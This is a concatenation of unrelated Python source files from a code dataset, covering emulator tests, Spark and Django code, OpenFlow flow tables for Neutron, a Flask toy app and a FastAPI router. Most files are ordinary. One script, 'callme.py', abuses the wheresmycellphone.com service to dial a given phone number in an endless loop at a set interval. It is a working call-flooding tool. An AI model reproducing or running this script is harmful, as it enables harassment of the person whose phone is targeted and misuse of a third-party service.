assert c.registers.get(1) == ord('A')
assert c.RAM.get(c.registers.get(0)) == ord('A')
def test_LDP():
program = '''
.data
.teststr string 'ABCDEF'
.replacer string '!'
.text
.global main:
main:
LDV A, .replacer
LDR B, A
LDV A, .teststr
LDP A, B
HLT
'''
c = execute_code(program)
assert c.kernel.read_string(c.registers.get(0)) == "!BCDEF"
| StarcoderdataPython |
11277476 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0.html
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import yaml
import argparse
from pyspark import SparkContext, SparkConf, Row
from pyspark.sql.functions import concat_ws, count, lit, col, udf, expr, collect_list, explode
from pyspark.sql import HiveContext
from util import resolve_placeholder
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Prepare data')
parser.add_argument('config_file')
args = parser.parse_args()
# Load config file
with open(args.config_file, 'r') as ymlfile:
cfg = yaml.load(ymlfile, Loader=yaml.FullLoader)
resolve_placeholder(cfg)
cfg_log = cfg['log']
cfg = cfg['pipeline']
sc = SparkContext()
hive_context = HiveContext(sc)
sc.setLogLevel(cfg_log['level'])
# save table as tfrecords
path = cfg['tfrecords']['tfrecords_hdfs_path']
input_table_name = cfg['normalization']['output_table_name']
command = """
SELECT * FROM {}
""".format(input_table_name)
df = hive_context.sql(command)
df.write.format("tfrecords").option("recordType", "Example").mode('overwrite').save(path)
sc.stop()
| StarcoderdataPython |
5138931 | from django.contrib import admin
from api.models import DevEvent,DevEventType,DevProject,WeekSummary,SaleActiveType,SaleCustomer,SalePhase,SaleTarget,SaleEvent
import xadmin
# Register your models here.
#class FelixProjectsAdmin(admin.ModelAdmin):
# class ApiProjectsAdmin(object):
# list_display = ('pj_name', 'pj_group', 'pj_category')
# xadmin.site.register(FelixProjects, FelixProjectsAdmin)\
# xadmin.site.register(DevEvent)
# xadmin.site.register(DevEventType)
# xadmin.site.register(DevProject)
# xadmin.site.register(WeekSummary)
# xadmin.site.register(SaleActiveType)
# xadmin.site.register(SaleCustomer)
# xadmin.site.register(SalePhase)
# xadmin.site.register(SaleTarget)
# xadmin.site.register(SaleEvent)
| StarcoderdataPython |
223495 | # --------------------------------------------------------------------------------------
# Copyright 2020 by Oculy Authors, see git history for more details.
#
# Distributed under the terms of the BSD license.
#
# The full license is in the file LICENCE, distributed with this software.
# --------------------------------------------------------------------------------------
"""Simple workspace manifest.
"""
import os
import enaml
from atom.api import Bool, Dict, List, Str, Typed
from enaml.workbench.ui.api import Workspace
from glaze.utils import invoke_command
from glaze.utils.atom_util import (
preferences_from_members,
update_members_from_preferences,
)
from watchdog.events import (
FileCreatedEvent,
FileDeletedEvent,
FileMovedEvent,
FileSystemEventHandler,
)
from watchdog.observers import Observer
from watchdog.observers.api import ObservedWatch
from oculy.data import Dataset
from oculy.io.loader import BaseLoader, BaseLoaderView
from .plot_1d_model import Plot1DPanelModel
from .plot_2d_model import Plot2DPanelModel
with enaml.imports():
from .content import SimpleViewerContent
class FileListUpdater(FileSystemEventHandler):
"""Watchdog event handler ensuring the list of plots is up to date."""
def __init__(self, workspace):
self.workspace = workspace
def on_created(self, event):
super(FileListUpdater, self).on_created(event)
if isinstance(event, FileCreatedEvent):
self.workspace._update_available_files()
def on_deleted(self, event):
super(FileListUpdater, self).on_deleted(event)
if isinstance(event, FileDeletedEvent):
self.workspace._update_available_files()
def on_moved(self, event):
super(FileListUpdater, self).on_deleted(event)
if isinstance(event, FileMovedEvent):
self.workspace._update_available_files()
class SimpleViewerWorkspace(Workspace):
"""State of the simple viewer workspace."""
#: Currently selected folder in which to look for data.
selected_folder = Str().tag(pref=True)
#: List of files in the selected folder.
available_files = List(str).tag(pref=True)
#: Are the files filtered so as to display only files for which a loader exist.
should_filter_files = Bool(True).tag(pref=True)
#: Currently selected file.
selected_file = Str().tag(pref=True)
#: Loader ids.
matching_loaders = List(str).tag(pref=True)
#: Are the loader ids are filtered to match the selected file.
should_filter_loaders = Bool(True).tag(pref=True)
#: Id of the currently selected loader.
selected_loader = Str().tag(pref=True)
#: Should data be loaded automatically.
auto_load = Bool().tag(pref=True)
#: Flag signaling that a file change is about to happen.
file_changing = Bool()
#: Content of the loaded file. This dict is never updated in place and
#: can hence be safely observed.
file_content = Dict()
# Set up methods used for handling preferences
update_members_from_preferences = update_members_from_preferences
preferences_from_members = preferences_from_members
def start(self):
""" """
datastore = self.workbench.get_plugin("oculy.data").datastore
# Create nodes used to stored data related to this workspace plots.
datastore.store_data(
{
"_simple_viewer/1d": (Dataset(), None),
"_simple_viewer/2d": (Dataset(), None),
}
)
self._1d_plots = Plot1DPanelModel(self, datastore)
self._2d_plots = Plot2DPanelModel(self, datastore)
self.content = SimpleViewerContent(workspace=self)
def stop(self):
datastore = self.workbench.get_plugin("oculy.data").datastore
datastore.store_data({"_simple_viewer/1d": (None, None)})
datastore.store_data({"_simple_viewer/2d": (None, None)})
def get_loader_view(self) -> BaseLoaderView:
"""Get a config view for the current loader."""
if self._loader is None:
self._create_loader()
return invoke_command(
self.workbench,
"oculy.io.create_loader_config",
{"id": self.selected_loader, "loader": self._loader},
self._loader,
)
def load_file(self):
"""Create loader for selected file and determine the entries."""
if self._loader is None:
self._create_loader()
self._loader.determine_content()
self.file_changing = True
self.file_content = self._loader.content
self.file_changing = False
# --- Private API
#: Loader in charge of performing io for the selected file.
_loader = Typed(BaseLoader)
#: Watchdog observer monitoring the currently selected folder.
_watchdog = Typed(Observer, ())
#: Handler for watchdog events.
_watchdog_handler = Typed(FileListUpdater)
#: Watch of the watchdog.
_watchdog_watch = Typed(ObservedWatch)
#: Cache of loader paarmeters used by the user in this session.
#: Cross-session persistence should be handled through the io plugin.
_loader_state_cache = Dict(str)
#: State of the 1D plots
_1d_plots = Typed(Plot1DPanelModel)
#: State of the 2D plot
_2d_plots = Typed(Plot2DPanelModel)
def _update_available_files(self):
"""Update the list of available files."""
files = []
trim = len(self.selected_folder) + 1
exts = self.workbench.get_plugin("oculy.io").supported_extensions
for dirpath, dirnames, filenames in os.walk(self.selected_folder):
files.extend(
sorted(
[
# Ensure we always get a full path by joining filename and
# selected dir
os.path.join(dirpath, f)[trim:]
for f in filenames
# Skip next branch if filtering is not required
if (not self.should_filter_files)
or any(f.endswith(ext) for ext in exts)
]
)
)
self.available_files = files
if self.selected_file not in files:
self.selected_file = files[0] if files else ""
def _update_matching_loaders(self):
"""Update the list of loaders matching the selected file."""
matching, preferred = invoke_command(
self.workbench,
"oculy.io.list_matching_loaders",
{"filename": self.selected_file},
)
self.matching_loaders = matching
if self.selected_loader not in matching:
self.selected_loader = preferred or matching[0]
def _create_loader(self):
"""Create a loader matching selection."""
self._loader = invoke_command(
self.workbench,
"oculy.io.create_loader",
{
"id": self.selected_loader,
"path": os.path.join(self.selected_folder, self.selected_file),
},
)
def _post_setattr_selected_folder(self, old, new):
"""Ensure the available file list is up to date and remains so."""
if self._watchdog_watch:
self._watchdog.unschedule(self._watchdog_watch)
self._update_available_files()
self._watchdog_watch = self._watchdog.schedule(self._watchdog_handler, new)
if not self._watchdog.is_alive():
self._watchdog.start()
def _post_setattr_should_filter_files(self, old, new):
"""Ensure the available file list respect filtering."""
self._update_available_files()
def _post_setattr_selected_file(self, old, new):
"""Ensure the loader list matches the selected file."""
self._update_matching_loaders()
if self._loader is not None:
self._loader.path = os.path.join(self.selected_folder, self.selected_file)
if self.auto_load:
self.load_file()
def _post_setattr_should_filter_loaders(self, old, new):
"""Ensure the matching loader list respect filtering."""
self._update_matching_loaders()
def _post_setattr_selected_loader(self, old, new):
"""Discard the previously created loader."""
if self._loader:
self._loader_state_cache[old] = self.loader.preferences_from_members()
self._loader = None
def _post_set_auto_load(self, old, new):
"""Ensure we auto-load the relevant file."""
if new and self.selected_folder and self.selected_file and self.selected_loader:
self.load_file()
def _default__watchdog_handler(self):
return FileListUpdater(workspace=self)
| StarcoderdataPython |
1897095 | <filename>src/python/nimbusml/tests/pipeline/test_pipeline_get_schema.py
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
# --------------------------------------------------------------------------------------------
import unittest
import numpy as np
import pandas as pd
from nimbusml import Pipeline, FileDataStream
from nimbusml.datasets import get_dataset
from nimbusml.feature_extraction.categorical import OneHotVectorizer
from nimbusml.linear_model import OnlineGradientDescentRegressor
from nimbusml.preprocessing.filter import RangeFilter
train_data = {'c0': ['a', 'b', 'a', 'b'],
'c1': [1, 2, 3, 4],
'c2': [2, 3, 4, 5]}
train_df = pd.DataFrame(train_data).astype({'c1': np.float64,
'c2': np.float64})
class TestPipelineGetSchema(unittest.TestCase):
def test_get_schema_returns_correct_value_for_single_valued_columns(self):
df = train_df.drop(['c0'], axis=1)
pipeline = Pipeline([RangeFilter(min=0.0, max=4.5) << 'c2'])
pipeline.fit(df)
df = pipeline.transform(df)
schema = pipeline.get_output_columns()
self.assertTrue('c1' in schema)
self.assertTrue('c2' in schema)
self.assertEqual(len(schema), 2)
def test_get_schema_returns_correct_value_for_vector_valued_columns(self):
pipeline = Pipeline([OneHotVectorizer() << 'c0'])
pipeline.fit(train_df)
schema = pipeline.get_output_columns()
self.assertTrue('c0.a' in schema)
self.assertTrue('c0.b' in schema)
self.assertTrue('c1' in schema)
self.assertTrue('c2' in schema)
self.assertEqual(len(schema), 4)
def test_get_schema_does_not_work_when_predictor_is_part_of_model(self):
df = train_df.drop(['c0'], axis=1)
pipeline = Pipeline([OnlineGradientDescentRegressor(label='c2')])
pipeline.fit(df)
try:
schema = pipeline.get_output_columns()
except Exception as e:
pass
else:
self.fail()
if __name__ == '__main__':
unittest.main()
| StarcoderdataPython |
5117905 | <filename>src/bpp/tests/tests_legacy/test_util.py
# -*- encoding: utf-8 -*-
from django.test import TestCase
from model_mommy import mommy
from bpp.models import Autor
from bpp.util import get_copy_from_db, has_changed, slugify_function
class TestUtil(TestCase):
def test_slugify_function(self):
test = "<NAME>,,()*':;\r\n[]"
result = "Waldemar-A-Lacki"
self.assertEqual(slugify_function(test), result)
def test_slugify_function_double_dash(self):
test = "<NAME>"
result = "Andrzej-Wrobel"
self.assertEqual(slugify_function(test), result)
def test_get_copy_from_db(self):
a = mommy.make(Autor)
b = get_copy_from_db(a)
self.assertEqual(a.pk, b.pk)
def test_has_changed(self):
a = mommy.make(Autor)
self.assertEqual(has_changed(a, "nazwisko"), False)
a.nazwisko = "Foo"
self.assertEqual(has_changed(a, "nazwisko"), True)
a.save()
self.assertEqual(has_changed(a, ["nazwisko", "imiona"]), False)
a.imiona = "Bar"
self.assertEqual(has_changed(a, ["nazwisko", "imiona"]), True)
| StarcoderdataPython |
173795 | """Collection of apicast gateways with different deployments or options"""
# flake8: noqa
from .system import SystemApicast, SystemApicastRequirements
from .containers import ContainerizedApicast
from .operator import OperatorApicast, OperatorApicastRequirements
from .selfmanaged import SelfManagedApicast, SelfManagedApicastRequirements
from .template import TemplateApicast, TemplateApicastRequirements
from .tls import TLSApicast, TLSApicastRequirements
| StarcoderdataPython |
3477627 | # -*- coding: utf-8 -*-
"""
.. _tutorial06_ref:
Tutorial 6: Regions and Parcellations
=====================================
This tutorial demonstrates how to plot brain regions.
Regions and parcellations can be plotted with ``brainplot`` as one or more
layers, and it's possible to add region outlines by simply adding a layer with
the `as_outline` parameter.
Parcellations
-------------
Multiple brain regions can be plotted as a single layer as long as the vertices
in different regions have different numerical labels/values, which is typical
for any parcelation. To demonstrate, we can use the
:func:`~brainspace.datasets.load_parcellation` from ``Brainspace`` to load the
`Schaefer 400 parcellation`_.
"""
from neuromaps.datasets import fetch_fslr
from surfplot import Plot
from brainspace.datasets import load_parcellation
surfaces = fetch_fslr()
lh, rh = surfaces['inflated']
p = Plot(lh, rh)
# add schaefer parcellation (no color bar needed)
lh_parc, rh_parc = load_parcellation('schaefer')
p.add_layer({'left': lh_parc, 'right': rh_parc}, cbar=False)
fig = p.build()
fig.show()
###############################################################################
# Now can add a second layer of just the region outlines. This is done by
# setting `as_outline=True`. The color of the outlines are set by the `cmap`
# parameter, as with any data. To show black outlines, we can just use the
# `gray` colormap.
p.add_layer({'left': lh_parc, 'right': rh_parc}, cmap='gray',
as_outline=True, cbar=False)
fig = p.build()
fig.show()
###############################################################################
# Regions of Interest
# -------------------
#
# Often times we want to show a selection of regions, instead of all regions.
# These could be regions from a parcellation, regions defined from a
# functional localizer, etc.
#
# Let's select two regions from the Schaefer parcellation and zero-out the
# remaining regions. We'll just stick with the left hemisphere here.
import numpy as np
region_numbers = [71, 72]
# zero-out all regions except 71 and 72
regions = np.where(np.isin(lh_parc, region_numbers), lh_parc, 0)
###############################################################################
# Although we can use a pre-defined color map, we might want to define a
# custom colormap where we can define the exact color for each region. This is
# possible using ``matplotlib``:
from matplotlib.colors import LinearSegmentedColormap
colors = ['orange', 'steelblue']
cmap = LinearSegmentedColormap.from_list('regions', colors, N=2)
###############################################################################
# Now we can plot both regions with their outlines:
# only need to show the left lateral view
p = Plot(lh, views='lateral')
p.add_layer(regions, cmap=cmap, cbar=False)
p.add_layer(regions, cmap='gray', as_outline=True, cbar=False)
fig = p.build()
fig.show()
# sphinx_gallery_thumbnail_number = 3
###############################################################################
# .. note::
# Multiple regions can also be plotted as individual layers, rather
# than combined as a single layer, as shown here. In this case, the vertex
# array(s) for each layer would be binary.
#
# .. _Schaefer 400 parcellation: https://github.com/ThomasYeoLab/CBIG/tree/master/stable_projects/brain_parcellation/Schaefer2018_LocalGlobal | StarcoderdataPython |
374265 | '''
(ab)uses wheresmycellphone.com to call a phone
'''
import urllib2,urllib,sys,time
def usage():
print '''
Dials a phone number at specified intervals forever (until ctrl+c).
Usage: callme.py <number> <delay>
E.G.: callme.py 3015551234 90
Number: A phone number, no punctuation or spaces
Delay: How many seconds between call attempts (recommend 70 seconds or more
to allow ring out)
'''
def call_forever(number,wait):
'''
Dial NUMBER every WAIT seconds, forever, unless
we get 4 non-OK responses from the server
'''
http_non_200 = 0
while True:
if http_non_200 > 3:
"print [!] too many bad reesponses from server - aborting"
break
query_args = {
"noArea" : number[:3],
"noNumb" : number[3:],
"noWhen" : 0,
}
data = urllib.urlencode(query_args)
request = urllib2.Request("http://www.wheresmycellphone.com", data)
response = urllib2.urlopen(request)
if response.getcode() != 200:
print "[!] non-OK response from server"
http_non_200 += 1
else:
print "[i] successfully called %s" % number
print "[i] sleeping for %s seconds" % wait
time.sleep(wait)
def main():
if len(sys.argv) == 1:
usage()
else:
number = unicode(sys.argv[1])
wait = int(sys.argv[2])
call_forever(number,wait)
if __name__ == "__main__":
main() | StarcoderdataPython |
6542744 | # Set up your imports here!
# import ...
from flask import Flask
app = Flask(__name__)
@app.route('/') # Fill this in!
def index():
# Welcome Page
# Create a generic welcome page.
return "<h1>Welcome! Go to /puppy_latin/name to see your name in puppy latin!</h1>"
@app.route('/puppy_latin/<name>') # Fill this in!
def puppylatin(name):
# This function will take in the name passed
# and then use "puppy-latin" to convert it!
if name[-1].lower() == 'y':
lat_name = name[:-1] + 'iful'
else:
lat_name = name + 'y'
# HINT: Use indexing and concatenation of strings
# For Example: "hello"+" world" --> "hello world"
return f"Hi {name}! Your puppy latin name is {lat_name}"
if __name__ == '__main__':
# Fill me in!
#app.run(debug=True) for debug mode
app.run()
| StarcoderdataPython |
3249328 | <reponame>ic-labs/django-icekit<filename>icekit_events/migrations/0007_type_fixtures.py<gh_stars>10-100
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
def make_type_fixtures(apps, _):
EventType = apps.get_model("icekit_events", "EventType")
EventType.objects.get_or_create(
slug="education",
defaults=dict(
title="Education",
is_public=False,
)
)
EventType.objects.get_or_create(
slug="members",
defaults=dict(
title="Members",
is_public=False,
)
)
def backwards(apps, _):
pass
class Migration(migrations.Migration):
dependencies = [
('icekit_events', '0006_auto_20161107_1747'),
]
operations = [
migrations.RunPython(make_type_fixtures, backwards)
]
| StarcoderdataPython |
1840950 | <reponame>gampel/neutron<filename>neutron/plugins/ofagent/agent/flows.py
# Copyright (C) 2014 VA Linux Systems Japan K.K.
# Copyright (C) 2014 <NAME> <yamamoto at valinux co jp>
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
OpenFlow1.3 flow table for OFAgent
* requirements
** plain OpenFlow 1.3. no vendor extensions.
* legends
xxx: network id (agent internal use)
yyy: segment id (vlan id, gre key, ...)
a,b,c: tunnel port (tun_ofports, map[net_id].tun_ofports)
i,j,k: vm port (map[net_id].vif_ports[vif_id].ofport)
x,y,z: physical port (int_ofports)
N: tunnel type (0 for TYPE_GRE, 1 for TYPE_xxx, ...)
iii: unknown ip address
uuu: unicast l2 address
* tables (in order)
CHECK_IN_PORT
TUNNEL_IN+N
PHYS_IN
LOCAL_IN
ARP_PASSTHROUGH
ARP_RESPONDER
TUNNEL_OUT
LOCAL_OUT
PHYS_OUT
TUNNEL_FLOOD+N
PHYS_FLOOD
LOCAL_FLOOD
* CHECK_IN_PORT
for each vm ports:
// check_in_port_add_local_port, check_in_port_delete_port
in_port=i, write_metadata(LOCAL|xxx),goto(LOCAL_IN)
TYPE_GRE
for each tunnel ports:
// check_in_port_add_tunnel_port, check_in_port_delete_port
in_port=a, goto(TUNNEL_IN+N)
TYPE_VLAN
for each networks ports:
// provision_tenant_physnet, reclaim_tenant_physnet
in_port=x,vlan_vid=present|yyy, write_metadata(xxx),goto(PHYS_IN)
TYPE_FLAT
// provision_tenant_physnet, reclaim_tenant_physnet
in_port=x, write_metadata(xxx),goto(PHYS_IN)
default drop
* TUNNEL_IN+N (per tunnel types) tunnel -> network
for each networks:
// provision_tenant_tunnel, reclaim_tenant_tunnel
tun_id=yyy, write_metadata(xxx),goto(TUNNEL_OUT)
default drop
* PHYS_IN
default goto(TUNNEL_OUT)
* LOCAL_IN
default goto(next_table)
* ARP_PASSTHROUGH
for each unknown tpa:
// arp_passthrough
arp,arp_op=request,metadata=xxx,tpa=iii, idle_timeout=5, goto(TUNNEL_OUT)
default goto(next_table)
* ARP_RESPONDER
arp,arp_op=request, output:controller
default goto(next_table)
* TUNNEL_OUT
TYPE_GRE
// !FLOODING_ENTRY
// install_tunnel_output, delete_tunnel_output
metadata=LOCAL|xxx,eth_dst=uuu set_tunnel(yyy),output:a
default goto(next table)
* LOCAL_OUT
for each known destinations:
// local_out_add_port, local_out_delete_port
metadata=xxx,eth_dst=uuu output:i
default goto(next table)
* PHYS_OUT
NOTE(yamamoto): currently this table is always empty.
default goto(next table)
* TUNNEL_FLOOD+N. (per tunnel types)
network -> tunnel/vlan
output to tunnel/physical ports
"next table" might be LOCAL_OUT
TYPE_GRE
for each networks:
// FLOODING_ENTRY
// install_tunnel_output, delete_tunnel_output
metadata=LOCAL|xxx, set_tunnel(yyy),output:a,b,c,goto(next table)
default goto(next table)
* PHYS_FLOOD
TYPE_VLAN
for each networks:
// provision_tenant_physnet, reclaim_tenant_physnet
metadata=LOCAL|xxx, push_vlan:0x8100,set_field:present|yyy->vlan_vid,
output:x,pop_vlan,goto(next table)
TYPE_FLAT
for each networks:
// provision_tenant_physnet, reclaim_tenant_physnet
metadata=LOCAL|xxx, output:x,goto(next table)
default goto(next table)
* LOCAL_FLOOD
for each networks:
// local_flood_update, local_flood_delete
metadata=xxx, output:i,j,k
or
metadata=xxx,eth_dst=broadcast, output:i,j,k
default drop
* references
** OVS agent https://wiki.openstack.org/wiki/Ovs-flow-logic
*** we use metadata instead of "internal" VLANs
*** we don't want to use NX learn action
"""
from ryu.lib.packet import arp
from ryu.ofproto import ether
from neutron.plugins.common import constants as p_const
import neutron.plugins.ofagent.agent.metadata as meta
from neutron.plugins.ofagent.agent import ofswitch
from neutron.plugins.ofagent.agent import tables
class OFAgentIntegrationBridge(ofswitch.OpenFlowSwitch):
"""ofagent br-int specific logic."""
def setup_default_table(self):
self.delete_flows()
self.install_default_drop(tables.CHECK_IN_PORT)
for t in tables.TUNNEL_IN.values():
self.install_default_drop(t)
self.install_default_goto(tables.PHYS_IN, tables.TUNNEL_OUT)
self.install_default_goto_next(tables.LOCAL_IN)
self.install_default_goto_next(tables.ARP_PASSTHROUGH)
self.install_arp_responder(tables.ARP_RESPONDER)
self.install_default_goto_next(tables.TUNNEL_OUT)
self.install_default_goto_next(tables.LOCAL_OUT)
self.install_default_goto_next(tables.PHYS_OUT)
for t in tables.TUNNEL_FLOOD.values():
self.install_default_goto_next(t)
self.install_default_goto_next(tables.PHYS_FLOOD)
self.install_default_drop(tables.LOCAL_FLOOD)
def install_arp_responder(self, table_id):
(dp, ofp, ofpp) = self._get_dp()
match = ofpp.OFPMatch(eth_type=ether.ETH_TYPE_ARP,
arp_op=arp.ARP_REQUEST)
actions = [ofpp.OFPActionOutput(ofp.OFPP_CONTROLLER)]
instructions = [
ofpp.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]
msg = ofpp.OFPFlowMod(dp,
table_id=table_id,
priority=1,
match=match,
instructions=instructions)
self._send_msg(msg)
self.install_default_goto_next(table_id)
def install_tunnel_output(self, table_id,
network, segmentation_id,
ports, goto_next, **additional_matches):
(dp, ofp, ofpp) = self._get_dp()
match = ofpp.OFPMatch(metadata=meta.mk_metadata(network, meta.LOCAL),
**additional_matches)
actions = [ofpp.OFPActionSetField(tunnel_id=segmentation_id)]
actions += [ofpp.OFPActionOutput(port=p) for p in ports]
instructions = [
ofpp.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions),
]
if goto_next:
instructions += [
ofpp.OFPInstructionGotoTable(table_id=table_id + 1),
]
msg = ofpp.OFPFlowMod(dp,
table_id=table_id,
priority=1,
match=match,
instructions=instructions)
self._send_msg(msg)
def delete_tunnel_output(self, table_id,
network, **additional_matches):
(dp, _ofp, ofpp) = self._get_dp()
self.delete_flows(table_id=table_id,
metadata=meta.mk_metadata(network, meta.LOCAL),
**additional_matches)
def provision_tenant_tunnel(self, network_type, network, segmentation_id):
(dp, _ofp, ofpp) = self._get_dp()
match = ofpp.OFPMatch(tunnel_id=segmentation_id)
metadata = meta.mk_metadata(network)
instructions = [
ofpp.OFPInstructionWriteMetadata(metadata=metadata[0],
metadata_mask=metadata[1]),
ofpp.OFPInstructionGotoTable(table_id=tables.TUNNEL_OUT),
]
msg = ofpp.OFPFlowMod(dp,
table_id=tables.TUNNEL_IN[network_type],
priority=1,
match=match,
instructions=instructions)
self._send_msg(msg)
def reclaim_tenant_tunnel(self, network_type, network, segmentation_id):
table_id = tables.TUNNEL_IN[network_type]
self.delete_flows(table_id=table_id, tunnel_id=segmentation_id)
def provision_tenant_physnet(self, network_type, network,
segmentation_id, phys_port):
"""for vlan and flat."""
assert(network_type in [p_const.TYPE_VLAN, p_const.TYPE_FLAT])
(dp, ofp, ofpp) = self._get_dp()
# inbound
metadata = meta.mk_metadata(network)
instructions = [
ofpp.OFPInstructionWriteMetadata(metadata=metadata[0],
metadata_mask=metadata[1])
]
if network_type == p_const.TYPE_VLAN:
vlan_vid = segmentation_id | ofp.OFPVID_PRESENT
match = ofpp.OFPMatch(in_port=phys_port, vlan_vid=vlan_vid)
actions = [ofpp.OFPActionPopVlan()]
instructions += [ofpp.OFPInstructionActions(
ofp.OFPIT_APPLY_ACTIONS, actions)]
else:
match = ofpp.OFPMatch(in_port=phys_port)
instructions += [ofpp.OFPInstructionGotoTable(table_id=tables.PHYS_IN)]
msg = ofpp.OFPFlowMod(dp,
priority=1,
table_id=tables.CHECK_IN_PORT,
match=match,
instructions=instructions)
self._send_msg(msg)
# outbound
match = ofpp.OFPMatch(metadata=meta.mk_metadata(network, meta.LOCAL))
if network_type == p_const.TYPE_VLAN:
actions = [
ofpp.OFPActionPushVlan(),
ofpp.OFPActionSetField(vlan_vid=vlan_vid),
]
else:
actions = []
actions += [ofpp.OFPActionOutput(port=phys_port)]
if network_type == p_const.TYPE_VLAN:
actions += [ofpp.OFPActionPopVlan()]
instructions = [
ofpp.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions),
ofpp.OFPInstructionGotoTable(table_id=tables.PHYS_FLOOD + 1),
]
msg = ofpp.OFPFlowMod(dp,
priority=1,
table_id=tables.PHYS_FLOOD,
match=match,
instructions=instructions)
self._send_msg(msg)
def reclaim_tenant_physnet(self, network_type, network,
segmentation_id, phys_port):
(_dp, ofp, _ofpp) = self._get_dp()
vlan_vid = segmentation_id | ofp.OFPVID_PRESENT
if network_type == p_const.TYPE_VLAN:
self.delete_flows(table_id=tables.CHECK_IN_PORT,
in_port=phys_port, vlan_vid=vlan_vid)
else:
self.delete_flows(table_id=tables.CHECK_IN_PORT,
in_port=phys_port)
self.delete_flows(table_id=tables.PHYS_FLOOD,
metadata=meta.mk_metadata(network))
def check_in_port_add_tunnel_port(self, network_type, port):
(dp, _ofp, ofpp) = self._get_dp()
match = ofpp.OFPMatch(in_port=port)
instructions = [
ofpp.OFPInstructionGotoTable(
table_id=tables.TUNNEL_IN[network_type])
]
msg = ofpp.OFPFlowMod(dp,
table_id=tables.CHECK_IN_PORT,
priority=1,
match=match,
instructions=instructions)
self._send_msg(msg)
def check_in_port_add_local_port(self, network, port):
(dp, ofp, ofpp) = self._get_dp()
match = ofpp.OFPMatch(in_port=port)
metadata = meta.mk_metadata(network, meta.LOCAL)
instructions = [
ofpp.OFPInstructionWriteMetadata(metadata=metadata[0],
metadata_mask=metadata[1]),
ofpp.OFPInstructionGotoTable(table_id=tables.LOCAL_IN),
]
msg = ofpp.OFPFlowMod(dp,
table_id=tables.CHECK_IN_PORT,
priority=1,
match=match,
instructions=instructions)
self._send_msg(msg)
def check_in_port_delete_port(self, port):
self.delete_flows(table_id=tables.CHECK_IN_PORT, in_port=port)
def local_flood_update(self, network, ports, flood_unicast):
(dp, ofp, ofpp) = self._get_dp()
match_all = ofpp.OFPMatch(metadata=meta.mk_metadata(network))
match_multicast = ofpp.OFPMatch(metadata=meta.mk_metadata(network),
eth_dst=('01:00:00:00:00:00',
'01:00:00:00:00:00'))
if flood_unicast:
match_add = match_all
match_del = match_multicast
else:
match_add = match_multicast
match_del = match_all
actions = [ofpp.OFPActionOutput(port=p) for p in ports]
instructions = [
ofpp.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions),
]
msg = ofpp.OFPFlowMod(dp,
table_id=tables.LOCAL_FLOOD,
priority=1,
match=match_add,
instructions=instructions)
self._send_msg(msg)
self.delete_flows(table_id=tables.LOCAL_FLOOD, strict=True,
priority=1, match=match_del)
def local_flood_delete(self, network):
self.delete_flows(table_id=tables.LOCAL_FLOOD,
metadata=meta.mk_metadata(network))
def local_out_add_port(self, network, port, mac):
(dp, ofp, ofpp) = self._get_dp()
match = ofpp.OFPMatch(metadata=meta.mk_metadata(network), eth_dst=mac)
actions = [ofpp.OFPActionOutput(port=port)]
instructions = [
ofpp.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions),
]
msg = ofpp.OFPFlowMod(dp,
table_id=tables.LOCAL_OUT,
priority=1,
match=match,
instructions=instructions)
self._send_msg(msg)
def local_out_delete_port(self, network, mac):
self.delete_flows(table_id=tables.LOCAL_OUT,
metadata=meta.mk_metadata(network), eth_dst=mac)
def arp_passthrough(self, network, tpa):
(dp, ofp, ofpp) = self._get_dp()
match = ofpp.OFPMatch(metadata=meta.mk_metadata(network),
eth_type=ether.ETH_TYPE_ARP,
arp_op=arp.ARP_REQUEST,
arp_tpa=tpa)
instructions = [
ofpp.OFPInstructionGotoTable(table_id=tables.TUNNEL_OUT)]
msg = ofpp.OFPFlowMod(dp,
table_id=tables.ARP_PASSTHROUGH,
priority=1,
idle_timeout=5,
match=match,
instructions=instructions)
self._send_msg(msg)
| StarcoderdataPython |
3395587 | <gh_stars>0
from datetime import datetime, date
from decimal import Decimal
from typing import Optional, List
from fastapi import APIRouter, Depends
from sqlmodel import Field, SQLModel
from ...db import get_session
from sqlalchemy import select
from sqlalchemy.ext.asyncio import AsyncSession
router = APIRouter()
class HistoryChiefComplaint(SQLModel, table=True):
id: Optional[int] = Field(default=None, primary_key=True)
history_id: int
detail: str
created_at: datetime
updated_at: datetime
created_by: int
updated_by: Optional[int] = None
@router.post("/history_chief_complaint", response_model=HistoryChiefComplaint)
async def create_history_chief_complaint(history_chief_complaint: HistoryChiefComplaint, session: AsyncSession = Depends(get_session)):
session.add(history_chief_complaint)
await session.commit()
await session.refresh(history_chief_complaint)
return history_chief_complaint
@router.get("/history_chief_complaint/{id}", response_model=HistoryChiefComplaint)
async def get_history_chief_complaint(id: int, session: AsyncSession = Depends(get_session)):
history_chief_complaints = await session.execute(select(HistoryChiefComplaint).where(HistoryChiefComplaint.id == id))
history_chief_complaint = history_chief_complaints.scalars().first()
return history_chief_complaint
@router.put("/history_chief_complaint/{id}", response_model=HistoryChiefComplaint)
async def update_history_chief_complaint(id: int, session: AsyncSession = Depends(get_session)):
return None
@router.delete("/history_chief_complaint/{id}")
async def delete_history_chief_complaint(session: AsyncSession = Depends(get_session)):
return None | StarcoderdataPython |
6559865 | from django.db import models
